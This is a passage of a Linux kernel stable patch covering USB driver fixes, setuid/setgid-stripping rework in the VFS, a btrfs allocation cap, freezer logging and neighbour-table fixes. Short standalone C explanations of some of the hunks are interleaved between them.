+  * usb_enumerate_device - Read device configs/intfs/otg (usbcore-internal)
+  * @udev: newly addressed device (in ADDRESS state)
+  *
+- * This is only called by usb_new_device() and usb_authorize_device()
+- * and FIXME -- all comments that apply to them apply here wrt to
+- * environment.
++ * This is only called by usb_new_device() -- all comments that apply there
++ * apply here wrt to environment.
+  *
+  * If the device is WUSB and not authorized, we don't attempt to read
+  * the string descriptors, as they will be errored out by the device
+diff --git a/drivers/usb/core/sysfs.c b/drivers/usb/core/sysfs.c
+index 631574718d8ac..ccf6cd9722693 100644
+--- a/drivers/usb/core/sysfs.c
++++ b/drivers/usb/core/sysfs.c
+@@ -868,11 +868,7 @@ read_descriptors(struct file *filp, struct kobject *kobj,
+ 	size_t srclen, n;
+ 	int cfgno;
+ 	void *src;
+-	int retval;
+ 
+-	retval = usb_lock_device_interruptible(udev);
+-	if (retval < 0)
+-		return -EINTR;
+ 	/* The binary attribute begins with the device descriptor.
+ 	 * Following that are the raw descriptor entries for all the
+ 	 * configurations (config plus subsidiary descriptors).
+@@ -897,7 +893,6 @@ read_descriptors(struct file *filp, struct kobject *kobj,
+ 			off -= srclen;
+ 		}
+ 	}
+-	usb_unlock_device(udev);
+ 	return count - nleft;
+ }
+ 
+diff --git a/drivers/usb/dwc3/dwc3-pci.c b/drivers/usb/dwc3/dwc3-pci.c
+index 89c9ab2b19f85..a23ddbb819795 100644
+--- a/drivers/usb/dwc3/dwc3-pci.c
++++ b/drivers/usb/dwc3/dwc3-pci.c
+@@ -47,6 +47,7 @@
+ #define PCI_DEVICE_ID_INTEL_ADLS		0x7ae1
+ #define PCI_DEVICE_ID_INTEL_RPL			0xa70e
+ #define PCI_DEVICE_ID_INTEL_RPLS		0x7a61
++#define PCI_DEVICE_ID_INTEL_MTLM		0x7eb1
+ #define PCI_DEVICE_ID_INTEL_MTLP		0x7ec1
+ #define PCI_DEVICE_ID_INTEL_MTL			0x7e7e
+ #define PCI_DEVICE_ID_INTEL_TGL			0x9a15
+@@ -467,6 +468,9 @@ static const struct pci_device_id dwc3_pci_id_table[] = {
+ 	{ PCI_VDEVICE(INTEL, PCI_DEVICE_ID_INTEL_RPLS),
+ 	  (kernel_ulong_t) &dwc3_pci_intel_swnode, },
+ 
++	{ PCI_VDEVICE(INTEL, PCI_DEVICE_ID_INTEL_MTLM),
++	  (kernel_ulong_t) &dwc3_pci_intel_swnode, },
++
+ 	{ PCI_VDEVICE(INTEL, PCI_DEVICE_ID_INTEL_MTLP),
+ 	  (kernel_ulong_t) &dwc3_pci_intel_swnode, },
+ 
+diff --git a/drivers/usb/gadget/function/u_serial.c b/drivers/usb/gadget/function/u_serial.c
+index 7538279f98179..db6fd0238d4b4 100644
+--- a/drivers/usb/gadget/function/u_serial.c
++++ b/drivers/usb/gadget/function/u_serial.c
+@@ -81,6 +81,9 @@
+ #define WRITE_BUF_SIZE		8192		/* TX only */
+ #define GS_CONSOLE_BUF_SIZE	8192
+ 
++/* Prevents race conditions while accessing gser->ioport */
++static DEFINE_SPINLOCK(serial_port_lock);
++
+ /* console info */
+ struct gs_console {
+ 	struct console		console;
+@@ -1374,8 +1377,10 @@ void gserial_disconnect(struct gserial *gser)
+ 	if (!port)
+ 		return;
+ 
++	spin_lock_irqsave(&serial_port_lock, flags);
++
+ 	/* tell the TTY glue not to do I/O here any more */
+-	spin_lock_irqsave(&port->port_lock, flags);
++	spin_lock(&port->port_lock);
+ 
+ 	gs_console_disconnect(port);
+ 
+@@ -1390,7 +1395,8 @@ void gserial_disconnect(struct gserial *gser)
+ 			tty_hangup(port->port.tty);
+ 	}
+ 	port->suspended = false;
+-	spin_unlock_irqrestore(&port->port_lock, flags);
++	spin_unlock(&port->port_lock);
++	spin_unlock_irqrestore(&serial_port_lock, flags);
+ 
+ 	/* disable endpoints, aborting down any active I/O */
+ 	usb_ep_disable(gser->out);
+@@ -1424,10 +1430,19 @@ EXPORT_SYMBOL_GPL(gserial_suspend);
+ 
+ void gserial_resume(struct gserial *gser)
+ {
+-	struct gs_port *port = gser->ioport;
++	struct gs_port *port;
+ 	unsigned long	flags;
+ 
+-	spin_lock_irqsave(&port->port_lock, flags);
++	spin_lock_irqsave(&serial_port_lock, flags);
++	port = gser->ioport;
++
++	if (!port) {
++		spin_unlock_irqrestore(&serial_port_lock, flags);
++		return;
++	}
++
++	spin_lock(&port->port_lock);
++	spin_unlock(&serial_port_lock);
+ 	port->suspended = false;
+ 	if (!port->start_delayed) {
+ 		spin_unlock_irqrestore(&port->port_lock, flags);
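The u_serial locking change above closes a disconnect/resume race: gserial_resume() used to dereference gser->ioport before taking the port lock, so a concurrent gserial_disconnect() could clear the pointer under it. The fix makes "read the pointer, then lock the object" atomic by nesting the per-port lock inside the new global serial_port_lock. A minimal pthread reduction of that pattern (names and the disconnect side are sketched from the patch, not copied from it):

#include <pthread.h>
#include <stddef.h>

static pthread_mutex_t serial_port_lock = PTHREAD_MUTEX_INITIALIZER;

struct port { pthread_mutex_t lock; int suspended; };
struct gser { struct port *ioport; };

void resume(struct gser *g)
{
	struct port *p;

	pthread_mutex_lock(&serial_port_lock);
	p = g->ioport;                  /* snapshot under the global lock */
	if (!p) {                       /* lost the race with disconnect */
		pthread_mutex_unlock(&serial_port_lock);
		return;
	}
	pthread_mutex_lock(&p->lock);   /* pin the object first ... */
	pthread_mutex_unlock(&serial_port_lock); /* ... then drop the global lock */
	p->suspended = 0;
	pthread_mutex_unlock(&p->lock);
}

void disconnect(struct gser *g)
{
	/* the pointer is cleared only while both locks are held */
	pthread_mutex_lock(&serial_port_lock);
	struct port *p = g->ioport;
	if (p) {
		pthread_mutex_lock(&p->lock);
		g->ioport = NULL;
		pthread_mutex_unlock(&p->lock);
	}
	pthread_mutex_unlock(&serial_port_lock);
}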
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index 6b69d05e2fb06..a8534065e0d6d 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -402,6 +402,8 @@ static void option_instat_callback(struct urb *urb);
+ #define LONGCHEER_VENDOR_ID			0x1c9e
+ 
+ /* 4G Systems products */
++/* This one was sold as the VW and Skoda "Carstick LTE" */
++#define FOUR_G_SYSTEMS_PRODUCT_CARSTICK_LTE	0x7605
+ /* This is the 4G XS Stick W14 a.k.a. Mobilcom Debitel Surf-Stick *
+  * It seems to contain a Qualcomm QSC6240/6290 chipset            */
+ #define FOUR_G_SYSTEMS_PRODUCT_W14		0x9603
+@@ -1976,6 +1978,8 @@ static const struct usb_device_id option_ids[] = {
+ 	  .driver_info = RSVD(2) },
+ 	{ USB_DEVICE(AIRPLUS_VENDOR_ID, AIRPLUS_PRODUCT_MCD650) },
+ 	{ USB_DEVICE(TLAYTECH_VENDOR_ID, TLAYTECH_PRODUCT_TEU800) },
++	{ USB_DEVICE(LONGCHEER_VENDOR_ID, FOUR_G_SYSTEMS_PRODUCT_CARSTICK_LTE),
++	  .driver_info = RSVD(0) },
+ 	{ USB_DEVICE(LONGCHEER_VENDOR_ID, FOUR_G_SYSTEMS_PRODUCT_W14),
+ 	  .driver_info = NCTRL(0) | NCTRL(1) },
+ 	{ USB_DEVICE(LONGCHEER_VENDOR_ID, FOUR_G_SYSTEMS_PRODUCT_W100),
+diff --git a/drivers/usb/typec/pd.c b/drivers/usb/typec/pd.c
+index dc72005d68db9..b5ab26422c349 100644
+--- a/drivers/usb/typec/pd.c
++++ b/drivers/usb/typec/pd.c
+@@ -161,7 +161,6 @@ static struct device_type source_fixed_supply_type = {
+ 
+ static struct attribute *sink_fixed_supply_attrs[] = {
+ 	&dev_attr_dual_role_power.attr,
+-	&dev_attr_usb_suspend_supported.attr,
+ 	&dev_attr_unconstrained_power.attr,
+ 	&dev_attr_usb_communication_capable.attr,
+ 	&dev_attr_dual_role_data.attr,
+diff --git a/fs/attr.c b/fs/attr.c
+index 1552a5f23d6b3..b45f30e516fad 100644
+--- a/fs/attr.c
++++ b/fs/attr.c
+@@ -18,6 +18,70 @@
+ #include <linux/evm.h>
+ #include <linux/ima.h>
+ 
++#include "internal.h"
++
++/**
++ * setattr_should_drop_sgid - determine whether the setgid bit needs to be
++ *                            removed
++ * @mnt_userns:	user namespace of the mount @inode was found from
++ * @inode:	inode to check
++ *
++ * This function determines whether the setgid bit needs to be removed.
++ * We retain backwards compatibility and require setgid bit to be removed
++ * unconditionally if S_IXGRP is set. Otherwise we have the exact same
++ * requirements as setattr_prepare() and setattr_copy().
++ *
++ * Return: ATTR_KILL_SGID if setgid bit needs to be removed, 0 otherwise.
++ */
++int setattr_should_drop_sgid(struct user_namespace *mnt_userns,
++			     const struct inode *inode)
++{
++	umode_t mode = inode->i_mode;
++
++	if (!(mode & S_ISGID))
++		return 0;
++	if (mode & S_IXGRP)
++		return ATTR_KILL_SGID;
++	if (!in_group_or_capable(mnt_userns, inode,
++				 i_gid_into_vfsgid(mnt_userns, inode)))
++		return ATTR_KILL_SGID;
++	return 0;
++}
++
++/**
++ * setattr_should_drop_suidgid - determine whether the set{g,u}id bit needs to
++ *                               be dropped
++ * @mnt_userns:	user namespace of the mount @inode was found from
++ * @inode:	inode to check
++ *
++ * This function determines whether the set{g,u}id bits need to be removed.
++ * If the setuid bit needs to be removed ATTR_KILL_SUID is returned. If the
++ * setgid bit needs to be removed ATTR_KILL_SGID is returned. If both
++ * set{g,u}id bits need to be removed the corresponding mask of both flags is
++ * returned.
++ *
++ * Return: A mask of ATTR_KILL_S{G,U}ID indicating which - if any - setid bits
++ * to remove, 0 otherwise.
++ */
++int setattr_should_drop_suidgid(struct user_namespace *mnt_userns,
++				struct inode *inode)
++{
++	umode_t mode = inode->i_mode;
++	int kill = 0;
++
++	/* suid always must be killed */
++	if (unlikely(mode & S_ISUID))
++		kill = ATTR_KILL_SUID;
++
++	kill |= setattr_should_drop_sgid(mnt_userns, inode);
++
++	if (unlikely(kill && !capable(CAP_FSETID) && S_ISREG(mode)))
++		return kill;
++
++	return 0;
++}
++EXPORT_SYMBOL(setattr_should_drop_suidgid);
++
+ /**
+  * chown_ok - verify permissions to chown inode
+  * @mnt_userns:	user namespace of the mount @inode was found from
+@@ -140,8 +204,7 @@ int setattr_prepare(struct user_namespace *mnt_userns, struct dentry *dentry,
+ 			vfsgid = i_gid_into_vfsgid(mnt_userns, inode);
+ 
+ 		/* Also check the setgid bit! */
+-		if (!vfsgid_in_group_p(vfsgid) &&
+-		    !capable_wrt_inode_uidgid(mnt_userns, inode, CAP_FSETID))
++		if (!in_group_or_capable(mnt_userns, inode, vfsgid))
+ 			attr->ia_mode &= ~S_ISGID;
+ 	}
+ 
+@@ -251,9 +314,8 @@ void setattr_copy(struct user_namespace *mnt_userns, struct inode *inode,
+ 		inode->i_ctime = attr->ia_ctime;
+ 	if (ia_valid & ATTR_MODE) {
+ 		umode_t mode = attr->ia_mode;
+-		vfsgid_t vfsgid = i_gid_into_vfsgid(mnt_userns, inode);
+-		if (!vfsgid_in_group_p(vfsgid) &&
+-		    !capable_wrt_inode_uidgid(mnt_userns, inode, CAP_FSETID))
++		if (!in_group_or_capable(mnt_userns, inode,
++					 i_gid_into_vfsgid(mnt_userns, inode)))
+ 			mode &= ~S_ISGID;
+ 		inode->i_mode = mode;
+ 	}
+@@ -375,7 +437,7 @@ int notify_change(struct user_namespace *mnt_userns, struct dentry *dentry,
+ 		}
+ 	}
+ 	if (ia_valid & ATTR_KILL_SGID) {
+-		if ((mode & (S_ISGID | S_IXGRP)) == (S_ISGID | S_IXGRP)) {
++		if (mode & S_ISGID) {
+ 			if (!(ia_valid & ATTR_MODE)) {
+ 				ia_valid = attr->ia_valid |= ATTR_MODE;
+ 				attr->ia_mode = inode->i_mode;
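The two helpers added to fs/attr.c above boil down to a small mode-bit rule: the setuid bit is always a candidate for removal, the setgid bit is removed when group-exec is set or when the writer is neither in the owning group nor CAP_FSETID-capable, and only regular files written by unprivileged callers are actually stripped. A standalone C reduction of that rule (the namespace, group, and capability checks are collapsed into plain booleans; only the ATTR_KILL_* values match include/linux/fs.h):

#include <stdio.h>
#include <sys/stat.h>

#define ATTR_KILL_SUID (1 << 11)   /* as in include/linux/fs.h */
#define ATTR_KILL_SGID (1 << 12)

static int should_drop_suidgid(mode_t mode, int in_group, int cap_fsetid)
{
	int kill = 0;

	if (mode & S_ISUID)                 /* setuid always must be killed */
		kill |= ATTR_KILL_SUID;
	if ((mode & S_ISGID) &&
	    ((mode & S_IXGRP) || !(in_group || cap_fsetid)))
		kill |= ATTR_KILL_SGID;     /* mirrors setattr_should_drop_sgid() */

	if (kill && !cap_fsetid && S_ISREG(mode))
		return kill;                /* unprivileged write to a regular file */
	return 0;
}

int main(void)
{
	/* sgid without group-exec, writer in the owning group: bit is kept */
	printf("%d\n", should_drop_suidgid(S_IFREG | S_ISGID, 1, 0));
	/* sgid with group-exec: dropped (prints ATTR_KILL_SGID = 4096) */
	printf("%d\n", should_drop_suidgid(S_IFREG | S_ISGID | S_IXGRP, 1, 0));
	return 0;
}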
+diff --git a/fs/btrfs/send.c b/fs/btrfs/send.c
+index 1c4b693ee4a3a..937b60ae576e0 100644
+--- a/fs/btrfs/send.c
++++ b/fs/btrfs/send.c
+@@ -7839,10 +7839,10 @@ long btrfs_ioctl_send(struct inode *inode, struct btrfs_ioctl_send_args *arg)
+ 	/*
+ 	 * Check that we don't overflow at later allocations, we request
+ 	 * clone_sources_count + 1 items, and compare to unsigned long inside
+-	 * access_ok.
++	 * access_ok. Also set an upper limit for allocation size so this can't
++	 * easily exhaust memory. Max number of clone sources is about 200K.
+ 	 */
+-	if (arg->clone_sources_count >
+-	    ULONG_MAX / sizeof(struct clone_root) - 1) {
++	if (arg->clone_sources_count > SZ_8M / sizeof(struct clone_root)) {
+ 		ret = -EINVAL;
+ 		goto out;
+ 	}
+diff --git a/fs/fuse/file.c b/fs/fuse/file.c
+index 89f4741728ba3..c996c0ef8c632 100644
+--- a/fs/fuse/file.c
++++ b/fs/fuse/file.c
+@@ -1313,7 +1313,7 @@ static ssize_t fuse_cache_write_iter(struct kiocb *iocb, struct iov_iter *from)
+ 			return err;
+ 
+ 		if (fc->handle_killpriv_v2 &&
+-		    should_remove_suid(file_dentry(file))) {
++		    setattr_should_drop_suidgid(&init_user_ns, file_inode(file))) {
+ 			goto writethrough;
+ 		}
+ 
+diff --git a/fs/inode.c b/fs/inode.c
+index b608528efd3a4..8c4078889754f 100644
+--- a/fs/inode.c
++++ b/fs/inode.c
+@@ -1948,41 +1948,13 @@ skip_update:
+ }
+ EXPORT_SYMBOL(touch_atime);
+ 
+-/*
+- * The logic we want is
+- *
+- *	if suid or (sgid and xgrp)
+- *		remove privs
+- */
+-int should_remove_suid(struct dentry *dentry)
+-{
+-	umode_t mode = d_inode(dentry)->i_mode;
+-	int kill = 0;
+-
+-	/* suid always must be killed */
+-	if (unlikely(mode & S_ISUID))
+-		kill = ATTR_KILL_SUID;
+-
+-	/*
+-	 * sgid without any exec bits is just a mandatory locking mark; leave
+-	 * it alone.  If some exec bits are set, it's a real sgid; kill it.
+-	 */
+-	if (unlikely((mode & S_ISGID) && (mode & S_IXGRP)))
+-		kill |= ATTR_KILL_SGID;
+-
+-	if (unlikely(kill && !capable(CAP_FSETID) && S_ISREG(mode)))
+-		return kill;
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL(should_remove_suid);
+-
+ /*
+  * Return mask of changes for notify_change() that need to be done as a
+  * response to write or truncate. Return 0 if nothing has to be changed.
+  * Negative value on error (change should be denied).
+  */
+-int dentry_needs_remove_privs(struct dentry *dentry)
++int dentry_needs_remove_privs(struct user_namespace *mnt_userns,
++			      struct dentry *dentry)
+ {
+ 	struct inode *inode = d_inode(dentry);
+ 	int mask = 0;
+@@ -1991,7 +1963,7 @@ int dentry_needs_remove_privs(struct dentry *dentry)
+ 	if (IS_NOSEC(inode))
+ 		return 0;
+ 
+-	mask = should_remove_suid(dentry);
++	mask = setattr_should_drop_suidgid(mnt_userns, inode);
+ 	ret = security_inode_need_killpriv(dentry);
+ 	if (ret < 0)
+ 		return ret;
+@@ -2023,7 +1995,7 @@ static int __file_remove_privs(struct file *file, unsigned int flags)
+ 	if (IS_NOSEC(inode) || !S_ISREG(inode->i_mode))
+ 		return 0;
+ 
+-	kill = dentry_needs_remove_privs(dentry);
++	kill = dentry_needs_remove_privs(file_mnt_user_ns(file), dentry);
+ 	if (kill < 0)
+ 		return kill;
+ 
+@@ -2487,6 +2459,28 @@ struct timespec64 current_time(struct inode *inode)
+ }
+ EXPORT_SYMBOL(current_time);
+ 
++/**
++ * in_group_or_capable - check whether caller is CAP_FSETID privileged
++ * @mnt_userns: user namespace of the mount @inode was found from
++ * @inode:	inode to check
++ * @vfsgid:	the new/current vfsgid of @inode
++ *
+ * Check whether @vfsgid is in the caller's group list or if the caller is
++ * privileged with CAP_FSETID over @inode. This can be used to determine
++ * whether the setgid bit can be kept or must be dropped.
++ *
++ * Return: true if the caller is sufficiently privileged, false if not.
++ */
++bool in_group_or_capable(struct user_namespace *mnt_userns,
++			 const struct inode *inode, vfsgid_t vfsgid)
++{
++	if (vfsgid_in_group_p(vfsgid))
++		return true;
++	if (capable_wrt_inode_uidgid(mnt_userns, inode, CAP_FSETID))
++		return true;
++	return false;
++}
++
+ /**
+  * mode_strip_sgid - handle the sgid bit for non-directories
+  * @mnt_userns: User namespace of the mount the inode was created from
+@@ -2508,11 +2502,9 @@ umode_t mode_strip_sgid(struct user_namespace *mnt_userns,
+ 		return mode;
+ 	if (S_ISDIR(mode) || !dir || !(dir->i_mode & S_ISGID))
+ 		return mode;
+-	if (in_group_p(i_gid_into_mnt(mnt_userns, dir)))
+-		return mode;
+-	if (capable_wrt_inode_uidgid(mnt_userns, dir, CAP_FSETID))
++	if (in_group_or_capable(mnt_userns, dir,
++				i_gid_into_vfsgid(mnt_userns, dir)))
+ 		return mode;
+-
+ 	return mode & ~S_ISGID;
+ }
+ EXPORT_SYMBOL(mode_strip_sgid);
+diff --git a/fs/internal.h b/fs/internal.h
+index 6f0386b34faec..5545c26d86ae5 100644
+--- a/fs/internal.h
++++ b/fs/internal.h
+@@ -150,7 +150,9 @@ extern int vfs_open(const struct path *, struct file *);
+  * inode.c
+  */
+ extern long prune_icache_sb(struct super_block *sb, struct shrink_control *sc);
+-extern int dentry_needs_remove_privs(struct dentry *dentry);
++int dentry_needs_remove_privs(struct user_namespace *, struct dentry *dentry);
++bool in_group_or_capable(struct user_namespace *mnt_userns,
++			 const struct inode *inode, vfsgid_t vfsgid);
+ 
+ /*
+  * fs-writeback.c
+@@ -234,3 +236,9 @@ int do_setxattr(struct user_namespace *mnt_userns, struct dentry *dentry,
+ 		struct xattr_ctx *ctx);
+ 
+ ssize_t __kernel_write_iter(struct file *file, struct iov_iter *from, loff_t *pos);
++
++/*
++ * fs/attr.c
++ */
++int setattr_should_drop_sgid(struct user_namespace *mnt_userns,
++			     const struct inode *inode);
+diff --git a/fs/ocfs2/file.c b/fs/ocfs2/file.c
+index 9c67edd215d5a..4d78e09795179 100644
+--- a/fs/ocfs2/file.c
++++ b/fs/ocfs2/file.c
+@@ -1991,7 +1991,7 @@ static int __ocfs2_change_file_space(struct file *file, struct inode *inode,
+ 		}
+ 	}
+ 
+-	if (file && should_remove_suid(file->f_path.dentry)) {
++	if (file && setattr_should_drop_suidgid(&init_user_ns, file_inode(file))) {
+ 		ret = __ocfs2_write_remove_suid(inode, di_bh);
+ 		if (ret) {
+ 			mlog_errno(ret);
+@@ -2279,7 +2279,7 @@ static int ocfs2_prepare_inode_for_write(struct file *file,
+ 		 * inode. There's also the dinode i_size state which
+ 		 * can be lost via setattr during extending writes (we
+ 		 * set inode->i_size at the end of a write. */
+-		if (should_remove_suid(dentry)) {
++		if (setattr_should_drop_suidgid(&init_user_ns, inode)) {
+ 			if (meta_level == 0) {
+ 				ocfs2_inode_unlock_for_extent_tree(inode,
+ 								   &di_bh,
+diff --git a/fs/open.c b/fs/open.c
+index a81319b6177f6..9d0197db15e7b 100644
+--- a/fs/open.c
++++ b/fs/open.c
+@@ -54,7 +54,7 @@ int do_truncate(struct user_namespace *mnt_userns, struct dentry *dentry,
+ 	}
+ 
+ 	/* Remove suid, sgid, and file capabilities on truncate too */
+-	ret = dentry_needs_remove_privs(dentry);
++	ret = dentry_needs_remove_privs(mnt_userns, dentry);
+ 	if (ret < 0)
+ 		return ret;
+ 	if (ret)
+@@ -723,10 +723,10 @@ retry_deleg:
+ 		return -EINVAL;
+ 	if ((group != (gid_t)-1) && !setattr_vfsgid(&newattrs, gid))
+ 		return -EINVAL;
+-	if (!S_ISDIR(inode->i_mode))
+-		newattrs.ia_valid |=
+-			ATTR_KILL_SUID | ATTR_KILL_SGID | ATTR_KILL_PRIV;
+ 	inode_lock(inode);
++	if (!S_ISDIR(inode->i_mode))
++		newattrs.ia_valid |= ATTR_KILL_SUID | ATTR_KILL_PRIV |
++				     setattr_should_drop_sgid(mnt_userns, inode);
+ 	/* Continue to send actual fs values, not the mount values. */
+ 	error = security_path_chown(
+ 		path,
+diff --git a/include/linux/fs.h b/include/linux/fs.h
+index 081d1f539628b..f14ecbeab2a9d 100644
+--- a/include/linux/fs.h
++++ b/include/linux/fs.h
+@@ -3118,7 +3118,7 @@ extern void __destroy_inode(struct inode *);
+ extern struct inode *new_inode_pseudo(struct super_block *sb);
+ extern struct inode *new_inode(struct super_block *sb);
+ extern void free_inode_nonrcu(struct inode *inode);
+-extern int should_remove_suid(struct dentry *);
++extern int setattr_should_drop_suidgid(struct user_namespace *, struct inode *);
+ extern int file_remove_privs(struct file *);
+ 
+ /*
+@@ -3549,7 +3549,7 @@ int __init list_bdev_fs_names(char *buf, size_t size);
+ 
+ static inline bool is_sxid(umode_t mode)
+ {
+-	return (mode & S_ISUID) || ((mode & S_ISGID) && (mode & S_IXGRP));
++	return mode & (S_ISUID | S_ISGID);
+ }
+ 
+ static inline int check_sticky(struct user_namespace *mnt_userns,
+diff --git a/kernel/power/process.c b/kernel/power/process.c
+index ddd9988327fe2..beeab7f9fac86 100644
+--- a/kernel/power/process.c
++++ b/kernel/power/process.c
+@@ -27,6 +27,8 @@ unsigned int __read_mostly freeze_timeout_msecs = 20 * MSEC_PER_SEC;
+ 
+ static int try_to_freeze_tasks(bool user_only)
+ {
++	const char *what = user_only ? "user space processes" :
++					"remaining freezable tasks";
+ 	struct task_struct *g, *p;
+ 	unsigned long end_time;
+ 	unsigned int todo;
+@@ -36,6 +38,8 @@ static int try_to_freeze_tasks(bool user_only)
+ 	bool wakeup = false;
+ 	int sleep_usecs = USEC_PER_MSEC;
+ 
++	pr_info("Freezing %s\n", what);
++
+ 	start = ktime_get_boottime();
+ 
+ 	end_time = jiffies + msecs_to_jiffies(freeze_timeout_msecs);
+@@ -82,7 +86,6 @@ static int try_to_freeze_tasks(bool user_only)
+ 	elapsed_msecs = ktime_to_ms(elapsed);
+ 
+ 	if (todo) {
+-		pr_cont("\n");
+ 		pr_err("Freezing of tasks %s after %d.%03d seconds "
+ 		       "(%d tasks refusing to freeze, wq_busy=%d):\n",
+ 		       wakeup ? "aborted" : "failed",
+@@ -101,8 +104,8 @@ static int try_to_freeze_tasks(bool user_only)
+ 			read_unlock(&tasklist_lock);
+ 		}
+ 	} else {
+-		pr_cont("(elapsed %d.%03d seconds) ", elapsed_msecs / 1000,
+-			elapsed_msecs % 1000);
++		pr_info("Freezing %s completed (elapsed %d.%03d seconds)\n",
++			what, elapsed_msecs / 1000, elapsed_msecs % 1000);
+ 	}
+ 
+ 	return todo ? -EBUSY : 0;
+@@ -130,14 +133,11 @@ int freeze_processes(void)
+ 		static_branch_inc(&freezer_active);
+ 
+ 	pm_wakeup_clear(0);
+-	pr_info("Freezing user space processes ... ");
+ 	pm_freezing = true;
+ 	error = try_to_freeze_tasks(true);
+-	if (!error) {
++	if (!error)
+ 		__usermodehelper_set_disable_depth(UMH_DISABLED);
+-		pr_cont("done.");
+-	}
+-	pr_cont("\n");
++
+ 	BUG_ON(in_atomic());
+ 
+ 	/*
+@@ -166,14 +166,9 @@ int freeze_kernel_threads(void)
+ {
+ 	int error;
+ 
+-	pr_info("Freezing remaining freezable tasks ... ");
+-
+ 	pm_nosig_freezing = true;
+ 	error = try_to_freeze_tasks(false);
+-	if (!error)
+-		pr_cont("done.");
+ 
+-	pr_cont("\n");
+ 	BUG_ON(in_atomic());
+ 
+ 	if (error)
+diff --git a/net/caif/caif_socket.c b/net/caif/caif_socket.c
+index 748be72532485..78c9729a6057d 100644
+--- a/net/caif/caif_socket.c
++++ b/net/caif/caif_socket.c
+@@ -1015,6 +1015,7 @@ static void caif_sock_destructor(struct sock *sk)
+ 		return;
+ 	}
+ 	sk_stream_kill_queues(&cf_sk->sk);
++	WARN_ON_ONCE(sk->sk_forward_alloc);
+ 	caif_free_client(&cf_sk->layer);
+ }
+ 
+diff --git a/net/core/filter.c b/net/core/filter.c
+index 0c2666e041d3c..b79a070fa8246 100644
+--- a/net/core/filter.c
++++ b/net/core/filter.c
+@@ -5807,7 +5807,7 @@ static int bpf_ipv4_fib_lookup(struct net *net, struct bpf_fib_lookup *params,
+ 		neigh = __ipv6_neigh_lookup_noref_stub(dev, dst);
+ 	}
+ 
+-	if (!neigh)
++	if (!neigh || !(neigh->nud_state & NUD_VALID))
+ 		return BPF_FIB_LKUP_RET_NO_NEIGH;
+ 
+ 	return bpf_fib_set_fwd_params(params, neigh, dev, mtu);
+@@ -5922,7 +5922,7 @@ static int bpf_ipv6_fib_lookup(struct net *net, struct bpf_fib_lookup *params,
+ 	 * not needed here.
+ 	 */
+ 	neigh = __ipv6_neigh_lookup_noref_stub(dev, dst);
+-	if (!neigh)
++	if (!neigh || !(neigh->nud_state & NUD_VALID))
+ 		return BPF_FIB_LKUP_RET_NO_NEIGH;
+ 
+ 	return bpf_fib_set_fwd_params(params, neigh, dev, mtu);
+diff --git a/net/core/neighbour.c b/net/core/neighbour.c
+index 952a54763358e..bf081f62ae58b 100644
+--- a/net/core/neighbour.c
++++ b/net/core/neighbour.c
+@@ -269,7 +269,7 @@ static int neigh_forced_gc(struct neigh_table *tbl)
+ 			    (n->nud_state == NUD_NOARP) ||
+ 			    (tbl->is_multicast &&
+ 			     tbl->is_multicast(n->primary_key)) ||
+-			    time_after(tref, n->updated))
++			    !time_in_range(n->updated, tref, jiffies))
+ 				remove = true;
+ 			write_unlock(&n->lock);
+ 
+@@ -289,7 +289,17 @@ static int neigh_forced_gc(struct neigh_table *tbl)
+ 
+ static void neigh_add_timer(struct neighbour *n, unsigned long when)
+ {
++	/* Use safe distance from the jiffies - LONG_MAX point while timer
++	 * is running in DELAY/PROBE state but still show to user space
++	 * large times in the past.
++	 */
++	unsigned long mint = jiffies - (LONG_MAX - 86400 * HZ);
++
+ 	neigh_hold(n);
++	if (!time_in_range(n->confirmed, mint, jiffies))
++		n->confirmed = mint;
++	if (time_before(n->used, n->confirmed))
++		n->used = n->confirmed;
+ 	if (unlikely(mod_timer(&n->timer, when))) {
+ 		printk("NEIGH: BUG, double timer add, state is %x\n",
+ 		       n->nud_state);
+@@ -1001,12 +1011,14 @@ static void neigh_periodic_work(struct work_struct *work)
+ 				goto next_elt;
+ 			}
+ 
+-			if (time_before(n->used, n->confirmed))
++			if (time_before(n->used, n->confirmed) &&
++			    time_is_before_eq_jiffies(n->confirmed))
+ 				n->used = n->confirmed;
+ 
+ 			if (refcount_read(&n->refcnt) == 1 &&
+ 			    (state == NUD_FAILED ||
+-			     time_after(jiffies, n->used + NEIGH_VAR(n->parms, GC_STALETIME)))) {
++			     !time_in_range_open(jiffies, n->used,
++						 n->used + NEIGH_VAR(n->parms, GC_STALETIME)))) {
+ 				*np = n->next;
+ 				neigh_mark_dead(n);
+ 				write_unlock(&n->lock);
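The neighbour.c hunks above replace open-coded time_after()/time_before() tests with time_in_range() so that entries whose timestamps land on the wrong side of a jiffies wraparound (or bogus far-future timestamps) are still aged out. The kernel's comparison macros tolerate wraparound because they compare through a signed subtraction; a standalone C illustration (macro bodies follow include/linux/jiffies.h, with the typecheck() guards dropped):

#include <stdio.h>
#include <limits.h>

#define time_after(a, b)       ((long)((b) - (a)) < 0)
#define time_before(a, b)      time_after(b, a)
#define time_in_range(a, b, c) (!time_before(a, b) && !time_after(a, c))

int main(void)
{
	unsigned long jiffies = 5;              /* counter just wrapped past ULONG_MAX */
	unsigned long stamp = ULONG_MAX - 5;    /* taken shortly before the wrap */

	/* a naive unsigned compare gets the ordering backwards; the macro does not */
	printf("naive: %d, time_after: %d\n",
	       jiffies > stamp, time_after(jiffies, stamp));
	printf("in range: %d\n", time_in_range(stamp, stamp - 10, jiffies));
	return 0;
}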
+diff --git a/net/core/stream.c b/net/core/stream.c
+index 516895f482356..cbb268c15251c 100644
+--- a/net/core/stream.c
++++ b/net/core/stream.c
+@@ -209,7 +209,6 @@ void sk_stream_kill_queues(struct sock *sk)
+ 	sk_mem_reclaim_final(sk);
+ 
+ 	WARN_ON_ONCE(sk->sk_wmem_queued);
+-	WARN_ON_ONCE(sk->sk_forward_alloc);
+ 
+ 	/* It is _impossible_ for the backlog to contain anything
+ 	 * when we get here.  All user references to this socket
+diff --git a/net/xfrm/xfrm_interface.c b/net/xfrm/xfrm_interface.c
+index 5a67b120c4dbd..94a3609548b11 100644
+--- a/net/xfrm/xfrm_interface.c
++++ b/net/xfrm/xfrm_interface.c
+@@ -310,6 +310,52 @@ static void xfrmi_scrub_packet(struct sk_buff *skb, bool xnet)
+ 	skb->mark = 0;
+ }
+ 
++static int xfrmi_input(struct sk_buff *skb, int nexthdr, __be32 spi,
++		       int encap_type, unsigned short family)
++{
++	struct sec_path *sp;
++
++	sp = skb_sec_path(skb);
